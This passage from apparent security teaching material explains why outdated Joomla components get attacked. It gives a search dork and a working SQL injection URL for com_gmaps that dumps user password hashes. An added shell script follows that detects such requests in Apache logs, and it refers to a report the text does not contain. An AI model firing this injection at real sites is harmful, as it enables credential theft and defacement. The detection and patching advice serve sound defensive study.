Standard open source web applications such as Joomla, phpMyAdmin, phpBB, Gallery and so on are favourite targets for hackers, and especially for script kiddies. Since the source code is public, it is important that the code is good. With Joomla (which I know best), it is mostly the add-on components that do not keep pace with development. Joomla can be extended with a heap of such components, and if you do not keep them updated, you are in a bad position.

Example: a security hole in a Joomla component:

Joomla Component com_gmaps
Dork:
“index.php?option=com_gmaps”

Expl:
index.php?option=com_gmaps&task=viewmap&Itemid=57&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*

On an older Joomla installation with an old version of the com_gmaps component installed, running the bottom line was enough to bring up the passwords. After that it was just a matter of logging in to the machine and changing web pages.
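A defender-side complement to the example above, added here and not part of the course material: a shell function that scans Apache access-log lines for the UNION SELECT pattern, normalising the /**/ and %20 spacing first, so that an attempt like the one shown turns up in the daily report rather than going unnoticed among the 404s. The log lines are constructed (documentation addresses), modelled on the httpd section of the Logwatch report above.

```shell
#!/bin/sh
# Added example (not from the course material): flag requests whose query
# string carries a UNION SELECT, after undoing the simple obfuscations
# (/**/ comments, %20, +) that are used to dodge naive pattern matching.

# Constructed sample lines in Apache combined log format:
SAMPLE_ACCESS='198.51.100.23 - - [27/Apr/2008:10:12:01 +0200] "GET /index.php?option=com_gmaps&task=viewmap&Itemid=57&mapId=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [27/Apr/2008:10:13:44 +0200] "GET /index.php?option=com_gmaps&task=viewmap&Itemid=57&mapId=-1/**/union/**/select/**/0,username,password/**/from/**/jos_users/* HTTP/1.1" 200 2210 "-" "Mozilla/4.0"
203.0.113.9 - - [27/Apr/2008:10:13:50 +0200] "GET /index.php?option=com_gmaps&mapId=-1%20UNION%20SELECT%201,2 HTTP/1.1" 500 310 "-" "Mozilla/4.0"
198.51.100.23 - - [27/Apr/2008:10:14:02 +0200] "GET /static/gallery/main.php?g2_view=core.ShowItem HTTP/1.1" 200 9000 "-" "Mozilla/5.0"'

# flag_sqli_requests < access-log
#   Prints "<client ip> <request path>" for each request whose target
#   contains union [all] select after normalisation. Returns 1 if any hit.
flag_sqli_requests() {
    awk '
        {
            ip = $1
            path = $7                       # target in "GET /x HTTP/1.1"
            q = tolower(path)
            gsub(/\/\*\*\//, " ", q)        # /**/ -> space
            gsub(/%20|\+/, " ", q)          # %20 and + -> space
            if (q ~ /union +(all +)?select/) {
                print ip, path; hits++
            }
        }
        END { exit (hits ? 1 : 0) }
    '
}

# Usage:  printf '%s\n' "$SAMPLE_ACCESS" | flag_sqli_requests
#         flag_sqli_requests < /var/log/httpd/access_log || echo "sqli attempts seen"
```

A match tells you the attempt was made, not whether it worked; the 200 response on the second line is the one to follow up, since the component evidently did not reject the request. The real fix is the one the text gives: keep the component updated (or remove it), because a log scan only finds the attackers who were not careful.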

 

Signs of a hacked machine?